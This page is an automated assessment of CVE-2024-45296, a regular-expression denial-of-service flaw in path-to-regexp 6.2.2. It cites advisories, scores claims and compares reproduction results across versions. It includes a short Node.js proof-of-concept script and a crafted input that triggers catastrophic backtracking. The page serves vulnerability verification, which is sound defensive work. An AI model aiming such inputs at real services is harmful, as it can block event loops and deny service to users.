← All assessments

CVE-2024-45296

pkg:npm/path-to-regexp@6.2.2

CVE: PUBLISHEDSUPPORTED
Live runs are off.

Why this label

  1. evidence_sufficient 0.93 ≥ 0.50
  2. → SUPPORTED: target_affected 0.97 ≥ 0.90, reproduced_on_target 0.98 ≥ 0.80, no claim disputed ≥ 0.50

Generated 2026-10-04 21:12 UTC · investigators anthropic/claude-sonnet-5.5 · judge typesafe-ai/jev

Claims

ClaimVerdictTechnically supportedCredibly disputed
The affected product is path-to-regexp.
product · asserted by CVE description
✓ supported0.980.03
GHSA identifies affected versions as < 0.1.10, >= 0.2.0 and < 1.9.0, >= 2.0.0 and < 3.3.0, >= 4.0.0 and < 6.3.0, and >= 7.0.0 and < 8.0.0.
versions · asserted by GHSA
✓ supported0.830.11
OSV identifies affected versions as < 0.1.10, >= 0.2.0 and < 1.9.0, >= 2.0.0 and < 3.3.0, >= 4.0.0 and < 6.3.0, and >= 7.0.0 and < 8.0.0.
versions · asserted by OSV
✓ supported0.910.06
No privileges are required to exploit the vulnerability.
auth · asserted by NVD
· unverified0.520.04
The attack vector is network-based.
vector · asserted by NVD
· unverified0.160.06
The problematic regular expression is generated when two parameters occur within one path segment and are separated by a character other than a period.
vector · asserted by CVE description
✓ supported0.940.03
Exploitation can cause poor regular-expression matching performance.
impact · asserted by CVE description
✓ supported0.980.03
Poor matching performance can block the JavaScript event loop.
impact · asserted by CVE description
✓ supported0.960.03
path-to-regexp@6.2.2 is affected by CVE-2024-45296
target · asserted by the scan or report under review
✓ supported0.970.06

Technical evidence

Vulnerable code
path-to-regexp 6.2.2 (src/index.ts, tokensToRegexp / tokenToRegexp): the default parameter pattern is [^\/#\?]+? with no exclusion of the preceding separator. For '/:a-:b-:c' this yields adjacent lazy groups separated by '-', so a non-matching input with many '-' causes about cubic backtracking. 6.3.0 adds a (?!-) lookahead.
PoC
Compile '/:a-:b-:c', then time re.test('/' + '-'*n + '/x'), which cannot match and forces backtracking. Print the regex source and elapsed ms per n. v8.0.0 has no pathToRegexp export, so a separate script used match('/:a-:b-:c')(s) with the same input.
Script
const m=require(process.cwd()+'/node_modules/path-to-regexp');
const path='/:a-:b-:c';
let re;
if(typeof m==='function') re=m(path,[]);
else { const r=m.pathToRegexp(path); re=r.regexp||r; }
console.log(re.source);
for(const n of [1000,2000]){
  const s='/'+'-'.repeat(n)+'/x';
  const t=process.hrtime.bigint();re.test(s);
  console.log(n,Number(process.hrtime.bigint()-t)/1e6,'ms');
}
VersionRoleResult
6.2.2targetreproduced
n=1000: 464ms; n=2000: 2400ms; n=4000: 18397ms (cubic growth).
6.2.1positive controlreproduced
Same regex as 6.2.2. n=1000: 290ms; n=2000: 2319ms.
0.1.9positive controlreproduced
n=1000: 176ms; n=2000: 1388ms.
6.3.0fixednot reproduced
Regex uses (?!-) lookaheads. n=1000: 0.09ms; n=2000: 0.01ms.
8.0.0fixednot reproduced
match('/:a-:b-:c') on the same input: n=20000 took 0.08ms.
0.1.10otherreproduced
Still slow for '/:a-:b-:c': n=1000 180ms, n=2000 1420ms. Its regex still has ([^/]+?).
0.1.12othernot reproduced
Regex has (?!\/|-) lookaheads. n=2000: 0.01ms.

Only the '/:a-:b-:c' pattern was tested, with the n=1000 and n=2000 sizes (n=4000 on 6.2.2 only). The 1.x, 2.x, 3.x and 7.x lines were not installed. Against the fix commit 29b96b4, 0.1.10 still produced an unprotected regex for this pattern, but 0.1.12 was protected. This may mean the stated 0.1.10 fixed boundary is incomplete for this pattern. No network service was run; c4 and c5 are deployment and CVSS properties.

Discourse evidence

The maintainer advisory (blakeembrey) says versions >=4.0.0 <6.3.0 are affected and fixed in 6.3.0, which puts 6.2.2 in range. It describes the two-parameters-per-segment regex, the event-loop blocking, and a CVSS vector of AV:N/PR:N. The only dispute found is a user (issue #328) saying NVD still flags the fixed versions. The maintainer replied that the checker needs fixing. No source disputes the claim about 6.2.2.

  • maintainerblakeembrey (pillarjs advisory)supports c62024-09-09
    A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (`.`). For example, `/:a-:b`.
  • maintainerblakeembrey (pillarjs advisory)supports c82024-09-09
    Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS.
  • maintainerblakeembrey (pillarjs advisory)supports c72024-09-09
    In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex.
  • maintainerblakeembrey (pillarjs advisory)supports target2024-09-09
    Affected versions: >=4.0.0, <6.3.0 ... Patched versions: 6.3.0
  • maintainerblakeembrey (pillarjs advisory)supports target2024-09-09
    These versions add backtrack protection when a custom regex pattern is not provided: ... 6.3.0
  • vuln dbGitHub Advisory Databasesupports c2
    >=4.0.0, <6.3.0
  • vuln dbGitHub advisory CVSSsupports c52024-09-09
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • vuln dbGitHub advisory CVSSsupports c42024-09-09
    Privileges required None
  • maintainerblakeembreyneutral target2024-09-17
    No, the fixes were already released. This would need to be fixed in the vulnerability checker since I don't see how releasing another version would fix this now.
  • communityGjomesquitaneutral c22024-09-17
    some vulnerability checkers (nvd.nist.gov) are still considering as a broken version.

Unresolved

  • No source explicitly names 6.2.2; it is affected only via the range >=4.0.0 <6.3.0 (fixed in 6.3.0).
  • NVD lists no machine-readable ranges, so NVD's stance on 6.2.2 was not confirmed.
  • The NVD page was not fetched, so NVD's own CVSS vector wording (c4/c5) is unverified. The quotes used come from the GitHub advisory CVSS.
  • Scanner vendor notes (e.g., NetApp advisory) were not reviewed.

Jev scores

Bug exists in some version0.98
Target version affected0.97
Evidence sufficient0.93
Reproduced on target0.98
Patch addresses the issue0.93
Credible dispute exists0.11
Impact matches description0.95
Positive control reproduced0.98
Authority of dispute (0 none – 3 maintainer)0.99

Official record

path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0.

SourceAffected rangesCovers target?
nvd——
ghsa< 0.1.10 || >= 0.2.0 < 1.9.0 || >= 2.0.0 < 3.3.0 || >= 7.0.0 < 8.0.0 || >= 4.0.0 < 6.3.0yes
osv>=0.2.0 <1.9.0 || <0.1.10 || >=7.0.0 <8.0.0 || >=2.0.0 <3.3.0 || >=4.0.0 <6.3.0yes

OSV reports for this exact version: GHSA-9wv6-86v2-598j, CVE-2024-45296, CVE-2026-4867, GHSA-37ch-88jc-xwx2 · CVSS 7.5 HIGH · CWE-1333

Evidence quality

  • ✓Fix commit or release identified
  • ✓Vulnerable code path identified
  • ✓Positive control reproduced
  • ✓Target version tested
  • ✓Maintainer or vendor statement found
  • ✓Sources agree on whether the target is in range

Run history

  • 2026-10-04 21:09 · succeeded · SUPPORTED
  • 2026-10-04 19:58 · succeeded · SUPPORTED
  • 2026-10-04 19:56 · succeeded · SUPPORTED
  • 2026-10-04 19:53 · failed
  • 2026-10-04 19:52 · failed
  • 2026-10-04 19:49 · failed